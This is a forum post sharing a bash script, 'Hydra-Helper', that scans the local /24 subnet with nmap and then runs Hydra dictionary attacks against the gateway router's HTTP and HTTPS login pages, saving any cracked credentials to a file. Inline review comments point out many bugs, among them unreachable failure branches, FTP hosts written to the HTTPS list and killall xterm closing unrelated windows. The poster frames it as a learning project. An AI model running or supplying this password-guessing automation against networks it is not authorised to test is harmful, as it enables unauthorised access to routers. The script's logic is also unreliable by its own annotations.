Here's the update if anyone wants it.
Pastebin was down for me. soooo...
Code:
#/bin/bash
#NOTE(review): the line above lacks the '!' of a shebang, so it is an ordinary comment;
#the script runs under whatever shell invokes it (the [[ =~ ]] tests below need bash).
#Banner. $version is expanded here but only assigned further down (version=0.4), so the
#banner prints an empty version string.
echo "#####################################"
echo " Welcome to Hydra-Helper v$version"
echo " Automated password cracker"
echo " (C)opyright 2010 - Scamentology"
echo "#####################################"
echo "check /root/recovered.lst for results"
echo "#####################################"
#######################################
# (C)opyright 2010 - Scamentology #
#---License------------------------------------------------------------------------------------#
# This program is free software: you can redistribute it and/or modify it under the terms #
# of the GNU General Public License as published by the Free Software Foundation, either #
# version 3 of the License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; #
# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. #
# See the GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License along with this program. #
# If not, see <http://www.gnu.org/licenses/>
#----------------------------------------------------------------------------------------------#
#This is my first stab at a shell script so don't be rude.
#It was tested on the following routers
#--Linksys WRT54G
#--airlink-101
#--Does not work on Java-based routers (I gave up on that); every pair is reported as valid.
#Instructions
#You will need to give the path to your password list, then run the script
#---------------------------------------------------------------------------------------------------------------------#
#Must have Nmap and Hydra installed; Tested on Backtrack 4 R1
version=0.4
#---------------------------------------------------------------------------------------------------------------------------------#
#Default wordlist paths. Both are overridden later (username=/root/Hydra/user.lst,
#dictpath=/root/Hydra/pass.lst); $userpath is never read anywhere in this script.
dictpath=/root/pass.lst
userpath=/root/user.lst
#Failure messages are appended here and the file is printed at the end. Predictable path
#under /tmp, reused across runs because every write below uses >>.
logfile=/tmp/logfile.lst
#
#
#
#Dependency check for nmap. 'action' and 'display' are not defined in this file and are not
#standard commands, so choosing Y ends with "command not found" rather than an install.
#The post-install test also looks at a different path (nmap-services data file) than the
#pre-install test (/usr/bin/nmap). apt-get needs root; there is no privilege check.
if [ ! -e "/usr/bin/nmap" ] ; then
echo "Nmap is not installed."
read -p ">> Would you like to try and install it? [Y/n]: " -n 1
if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Nmap" "apt-get -y install nmap" ; fi
if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
echo "Failed to install Nmap"
else
display info "Installed: Nmap"
fi
fi
#Same pattern for hydra; same undefined 'action'/'display' helpers.
if [ ! -e "/usr/bin/hydra" ] ; then
echo "Hydra is not installed."
read -p ">> Would you like to try and install it? [Y/n]: " -n 1
if [[ "$REPLY" =~ ^[Yy]$ ]] ; then action "Install Hydra" "apt-get -y install hydra" ; fi
if [ ! -e "/usr/bin/hydra" ] ; then
echo "Failed to install Hydra"
else
display info "Installed: Hydra"
fi
fi
#Printed unconditionally, even when one of the installs above failed.
echo "Nmap and Hydra are installed. Lets continue..."
#Third field of the default route line; on a typical 'ip route' this is the gateway address.
#Empty if there is no default route, which then makes the nmap target below just "/24".
IP=$(ip route | grep default | awk '{ print $3}') #Gives us The Gateway IP address
smb=""
https=""
ftp=""
telnet=""
echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
echo "Finding Alive Hosts and Scanning them"
echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
#Scans the whole /24 around the gateway, not just the gateway; -Pn skips host discovery so
#every address in the range is port-scanned. This is a loud footprint on the network.
#Greppable output goes to /tmp/nmap.lst; the stdout captured in $nmap is never used.
#$IP is unquoted.
nmap=$(nmap -oG /tmp/nmap.lst -Pn $IP/24) #Tells us what ports are open.
#For each service: collect the host field (second whitespace-separated column of the -oG
#line) for hosts with that port open, then append the same list to a per-service file.
#The files are appended with >>, so results from earlier runs are kept.
#Only the http/https files are acted on below; smb, ftp and telnet lists are collected but
#unused (see the "insert removed code here" placeholder).
smb=$(grep '139/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$smb" == "" ]; then echo "No Open File Shares" ; fi
if [ "$smb" != "" ]; then grep '139/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/smb.lst ; fi
http=$(grep '80/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$http" == "" ]; then echo "No HTTP Servers" ; fi
if [ "$http" != "" ]; then grep '80/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/http.lst ; fi
https=$(grep '443/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$https" == "" ]; then echo "No HTTPS Servers" ; fi
if [ "$https" != "" ]; then grep '443/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
ftp=$(grep '21/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$ftp" == "" ]; then echo "No FTP Servers" ; fi
#NOTE(review): the FTP host list is appended to /tmp/https.lst, not an ftp file. That makes
#the HTTPS branch below run whenever any host has port 21 open. /tmp/ftp.lst, which the
#cleanup removes, is never created here.
if [ "$ftp" != "" ]; then grep '21/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/https.lst ; fi
telnet=$(grep '23/open' /tmp/nmap.lst | awk '{ print $2}')
if [ "$telnet" == "" ]; then echo "No Telnet Servers" ; fi
if [ "$telnet" != "" ]; then grep '23/open' /tmp/nmap.lst | awk '{ print $2}' >> /tmp/telnet.lst ; fi
#---------------------------------------------------------------------------------------------------------------------#
#
#Router Password Guesser
######################################
#Wordlists actually used by hydra (these replace the values set at the top of the file).
username=/root/Hydra/user.lst
dictpath=/root/Hydra/pass.lst
#Parallel hydra tasks.
tasks=15
######################################
#Existence of the list file is the only gate; the hosts inside it are not used. Hydra is
#pointed at $IP (the gateway) regardless of which hosts were found with port 80 open.
if [ -e "/tmp/http.lst" ] ; then
echo "<<<<<<<<<>>>>>>>>>>>"
echo "Attacking on Port 80"
echo "<<<<<<<<<>>>>>>>>>>>"
#Runs hydra inside an xterm; 'xterm -e' returns when hydra exits, so the script blocks here.
#Flags: -L/-P login and password files, -e n/-e s also try empty and login-as-password,
#-t parallel tasks, -f stop after the first found pair, -w response wait, -v verbose,
#http-get against "/", results written to /tmp/tmp.lst (predictable path, not cleaned up).
#Wordlist paths and $IP are interpolated unquoted into the command string.
xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP http-get / -o /tmp/tmp.lst"
#The >> redirection creates /tmp/rec1.lst even when grep matches nothing, so the -e test on
#the next line is always true (matching lines are appended a second time) and the
#"! -e" branch after it can never run; "HTTP Attack Failed" is never logged.
grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst
if [ -e "/tmp/rec1.lst" ] ; then grep 'password' /tmp/tmp.lst >> /tmp/rec1.lst ; fi
if [ ! -e "/tmp/rec1.lst" ] ; then echo "HTTP Attack Failed" >> $logfile ; fi
#rm /tmp/tmp.lst /tmp/rec1.lst 2>/dev/null
fi
#Same structure for HTTPS (-S enables SSL; output in /tmp/tmp2.lst, hits in /tmp/rec2.lst).
#Same always-true/never-true file tests as the HTTP branch.
if [ -e "/tmp/https.lst" ] ; then
echo "<<<<<<<<<>>>>>>>>>>>>"
echo "Attacking on Port 443"
echo "<<<<<<<<<>>>>>>>>>>>>"
xterm -geometry 75x15+10+215 -T "Hydra-Helper v$version - Cracking Router" -e "hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o /tmp/tmp2.lst"
grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst
if [ -e "/tmp/rec2.lst" ] ; then grep 'password' /tmp/tmp2.lst >> /tmp/rec2.lst ; fi
if [ ! -e "/tmp/rec2.lst" ] ; then echo "HTTPS Attack Failed" >> $logfile ; fi
#rm /tmp/tmp.lst /tmp/rec2.lst 2>/dev/null
fi
###############
#insert removed code here (therest.lst)
###############
#
sleep 5
#Kills every xterm belonging to the user, not just the ones this script opened. Since
#'xterm -e' has presumably already returned by this point, the script's own windows are
#gone and this only affects unrelated xterm sessions.
killall xterm 2>/dev/null
#---------------------------------------------------------------------------------------------------------------------#
#
#
#Result reporting. Because /tmp/rec1.lst always exists once the HTTP branch ran (see above),
#"No HTTP passwords found" only prints when the HTTP branch was skipped entirely; likewise
#for HTTPS.
if [ ! -e "/tmp/rec1.lst" ] ; then
echo "No HTTP passwords found" ; fi
#Recovered credentials are stored in plain text in /root/recovered.lst and also remain in
#the /tmp files; with a permissive umask the /tmp copies are readable by other local users.
#Appending means old results accumulate across runs.
if [ -e "/tmp/rec1.lst" ] ; then
grep 'password' /tmp/rec1.lst >> /root/recovered.lst 2>/dev/null ; fi
if [ ! -e "/tmp/rec2.lst" ] ; then
echo "No HTTPS passwords found" ; fi
if [ -e "/tmp/rec2.lst" ] ; then
grep 'password' /tmp/rec2.lst >> /root/recovered.lst 2>/dev/null ; fi
#/root/recovered.lst is created by the >> above whenever a rec file existed, even if it
#gained no lines, so this message is only reached when neither branch ran.
if [ ! -e "/root/recovered.lst" ] ; then
echo "No passwords recovered" ; fi
cat $logfile 2>/dev/null
#Errors to stderr if the file does not exist (no redirection here).
cat /root/recovered.lst
#cleanup...
#Removes the per-service lists and rec2/rec3/rec5, but not /tmp/rec1.lst, /tmp/tmp.lst,
#/tmp/tmp2.lst or $logfile, so HTTP hits and hydra output persist and are re-appended on the
#next run. /tmp/rec3.lst and /tmp/rec5.lst are never created in this version. The
#hydra.restore path is hard-coded to a removable-media location; hydra writes that file in
#its working directory, which is not changed by this script.
rm /tmp/rec2.lst /tmp/rec3.lst /tmp/http.lst /tmp/https.lst /tmp/smb.lst /tmp/telnet.lst /tmp/ftp.lst /tmp/nmap.lst /tmp/rec5.lst /media/disk/mine/ISO/tools/hydra.restore 2>/dev/null
#Exit status is that of the last command (the rm, which is masked by 2>/dev/null only for
#output, not status). Everything below is never executed.
exit
#
#
#
#todo
#match IP addresses to passwords in /root/recovered.lst
#add errors for missing stuff
#add ssl support
#add interrupt handling and cleanup
#add nmap options
#add auto time and date to details
#add scan to detect router brand and customize attack
I have improved the script and added support for both HTTP and HTTPS.
It works pretty flawlessly on my Linksys WRT54G and my Airlink 101, but won't work on the D-Link that uses Java.
I will be adding ftp and smb support next
Thanks. This is a learning experience for me, so I'm doing this for fun.
I know there are other tools that do this but I wanted to automate it as much as possible and improve my shell scripting (which sucks as of now).
I seem to be addicted to this.